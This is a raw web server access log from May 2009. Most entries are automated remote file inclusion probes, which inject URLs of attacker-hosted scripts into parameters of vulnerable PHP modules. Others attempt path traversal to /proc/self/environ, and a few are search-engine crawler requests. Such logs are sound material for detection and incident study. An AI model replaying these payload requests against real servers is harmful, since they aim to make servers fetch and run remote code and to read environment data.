218.150.79.146 - - [14/May/2009:04:51:00 -0500] "GET /logs/access_log.1235174400/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:51:10 -0500] "GET /logs/access_log.1233532800/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:51:10 -0500] "GET /logs/access_log.1232409600/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:04:52:49 -0500] "GET /logs/access_log.1146960000 HTTP/1.1" 200 2071 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [14/May/2009:04:55:12 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:04:55:12 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:04:58:04 -0500] "GET /logs/access_log.1211587200 HTTP/1.1" 200 298 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.234.200.229 - - [14/May/2009:04:58:41 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 327 "-""Mozilla/4.61 [en] (OS/2; U)"
200.234.200.229 - - [14/May/2009:04:58:41 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 332 "-""Mozilla/4.61 [en] (OS/2; U)"
200.234.200.229 - - [14/May/2009:04:58:41 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.61 [en] (OS/2; U)"
200.234.200.229 - - [14/May/2009:04:58:41 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.61 [en] (OS/2; U)"
200.234.200.229 - - [14/May/2009:04:58:42 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 332 "-""XXXXXX"
200.234.200.229 - - [14/May/2009:04:58:42 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 327 "-""XXXXXX"
200.234.200.229 - - [14/May/2009:04:58:42 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 332 "-""XXXXXX"
200.234.200.229 - - [14/May/2009:04:58:42 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""XXXXXX"
216.117.191.71 - - [14/May/2009:04:59:24 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
216.117.191.71 - - [14/May/2009:04:59:24 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
219.94.148.39 - - [14/May/2009:04:59:24 -0500] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:04:59:24 -0500] "GET /logs/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:04:59:24 -0500] "GET /logs/access_log.1239321600/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
87.106.135.14 - - [14/May/2009:05:02:10 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:05:02:10 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:05:03:25 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:05:03:26 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:05:03:26 -0500] "GET /logs/access_log.1113523200 HTTP/1.1" 200 192 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [14/May/2009:05:05:24 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:05:05:24 -0500] "GET //testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:05:05:25 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:05:05:25 -0500] "GET //testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
85.214.83.196 - - [14/May/2009:05:06:14 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.69"
85.214.83.196 - - [14/May/2009:05:06:15 -0500] "GET //testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.69"
65.55.106.121 - - [14/May/2009:05:06:17 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.178.197.14 - - [14/May/2009:05:06:19 -0500] "GET /logs///components/com_simpleboard/image_upload.php?sbp=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
62.178.197.14 - - [14/May/2009:05:06:20 -0500] "GET ///components/com_simpleboard/image_upload.php?sbp=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
203.22.204.90 - - [14/May/2009:05:06:37 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
203.22.204.90 - - [14/May/2009:05:06:37 -0500] "GET //testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
65.55.106.121 - - [14/May/2009:05:07:29 -0500] "GET /logs/access_log.1230076800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.94.30.156 - - [14/May/2009:05:07:32 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:05:07:33 -0500] "GET //testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:05:08:38 -0500] "GET /logs/access_log.1198627200 HTTP/1.1" 200 500 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.7.201.86 - - [14/May/2009:05:08:47 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.826"
66.7.201.86 - - [14/May/2009:05:08:47 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.826"
66.7.201.86 - - [14/May/2009:05:08:52 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.826"
66.7.201.86 - - [14/May/2009:05:08:52 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.826"
84.201.208.50 - - [14/May/2009:05:09:12 -0500] "GET /logs/access_log.1238889600/modules/My_eGallery/index.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:05:09:12 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:05:09:12 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:05:09:16 -0500] "GET /logs/access_log.1230940800/modules/My_eGallery/index.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.240.12.4 - - [14/May/2009:05:10:34 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mjswimgear.dk/joomla//logs/idv6.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
210.240.12.4 - - [14/May/2009:05:10:34 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mjswimgear.dk/joomla//logs/idv6.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
219.94.148.39 - - [14/May/2009:05:10:37 -0500] "GET /logs/access_log.1239926400/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:05:11:03 -0500] "GET /logs/access_log.1231200000//convert/mvcw.php?step=1&vwar_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.232.143.209 - - [14/May/2009:05:11:28 -0500] "GET //?_zb_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
66.232.143.209 - - [14/May/2009:05:11:29 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Microsoft Pocket Internet Explorer/0.6"
66.232.143.209 - - [14/May/2009:05:11:29 -0500] "GET //?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3245 "-""XXXXXX"
66.232.143.209 - - [14/May/2009:05:11:30 -0500] "GET //?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""XXXXXX"
66.232.143.209 - - [14/May/2009:05:11:30 -0500] "GET /logs//?_zb_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 200 189322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
66.232.143.209 - - [14/May/2009:05:11:30 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Microsoft Pocket Internet Explorer/0.6"
66.232.143.209 - - [14/May/2009:05:11:33 -0500] "GET /logs//?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 189322 "-""XXXXXX"
66.232.143.209 - - [14/May/2009:05:11:35 -0500] "GET /logs//?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 189322 "-""XXXXXX"
216.117.191.71 - - [14/May/2009:05:11:48 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
216.117.191.71 - - [14/May/2009:05:11:48 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
201.234.41.5 - - [14/May/2009:05:12:05 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
201.234.41.5 - - [14/May/2009:05:12:06 -0500] "GET //testheaderpage.php?rootSys=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
66.7.201.86 - - [14/May/2009:05:12:20 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.826"
66.7.201.86 - - [14/May/2009:05:12:20 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.826"
66.7.201.86 - - [14/May/2009:05:12:20 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.826"
66.7.201.86 - - [14/May/2009:05:12:20 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.826"
66.249.67.180 - - [14/May/2009:05:13:55 -0500] "GET /logs/access_log.1156809600 HTTP/1.1" 200 792 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.178.197.14 - - [14/May/2009:05:17:03 -0500] "GET /logs/home.php?index=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
62.178.197.14 - - [14/May/2009:05:17:04 -0500] "GET /home.php?index=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
66.249.67.180 - - [14/May/2009:05:19:13 -0500] "GET /logs/access_log.1191715200 HTTP/1.1" 200 3580 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.32.210.206 - - [14/May/2009:05:21:10 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 340 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:05:21:10 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 335 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:05:21:10 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 362 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:05:21:11 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 335 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:05:21:11 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 340 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:05:21:11 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 362 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:05:21:15 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 362 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:05:21:16 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 362 "-""Mozilla/5.0"
77.221.151.178 - - [14/May/2009:05:21:28 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
77.221.151.178 - - [14/May/2009:05:21:28 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
77.221.151.178 - - [14/May/2009:05:21:29 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
77.221.151.178 - - [14/May/2009:05:21:33 -0500] "GET /logs/access_log.1237420800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:05:24:30 -0500] "GET /logs/access_log.1129593600 HTTP/1.1" 200 810 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [14/May/2009:05:24:34 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:05:24:34 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:05:24:34 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:05:24:34 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
203.22.204.90 - - [14/May/2009:05:25:48 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 336 "-""libwww-perl/5.76"
203.22.204.90 - - [14/May/2009:05:25:49 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 331 "-""libwww-perl/5.76"
216.117.191.71 - - [14/May/2009:05:27:22 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
216.117.191.71 - - [14/May/2009:05:27:22 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
69.94.30.156 - - [14/May/2009:05:27:26 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:05:27:27 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
88.191.103.144 - - [14/May/2009:05:27:40 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.825"
88.191.103.144 - - [14/May/2009:05:27:40 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.825"
216.117.191.71 - - [14/May/2009:05:28:40 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
216.117.191.71 - - [14/May/2009:05:28:40 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
66.249.67.180 - - [14/May/2009:05:29:53 -0500] "GET /logs/access_log.1196985600 HTTP/1.1" 200 1306 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [14/May/2009:05:32:14 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:05:32:14 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:05:32:15 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:05:32:15 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
216.117.191.71 - - [14/May/2009:05:32:40 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
216.117.191.71 - - [14/May/2009:05:32:40 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
201.234.41.5 - - [14/May/2009:05:32:58 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
201.234.41.5 - - [14/May/2009:05:32:59 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
66.249.67.180 - - [14/May/2009:05:35:05 -0500] "GET /logs/access_log.1154822400 HTTP/1.1" 200 2551 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.121 - - [14/May/2009:05:35:30 -0500] "GET /logs/access_log.1209859200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.151.178 - - [14/May/2009:05:35:37 -0500] "GET /logs/access_log.1236643200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
77.221.151.178 - - [14/May/2009:05:35:37 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
77.221.151.178 - - [14/May/2009:05:35:37 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
77.221.151.178 - - [14/May/2009:05:35:51 -0500] "GET /logs/access_log.1238803200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:05:36:29 -0500] "GET ///skin/zero_vote/setup.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:05:36:29 -0500] "GET /logs///skin/zero_vote/setup.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:05:36:29 -0500] "GET /logs/access_log.1230422400///skin/zero_vote/setup.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
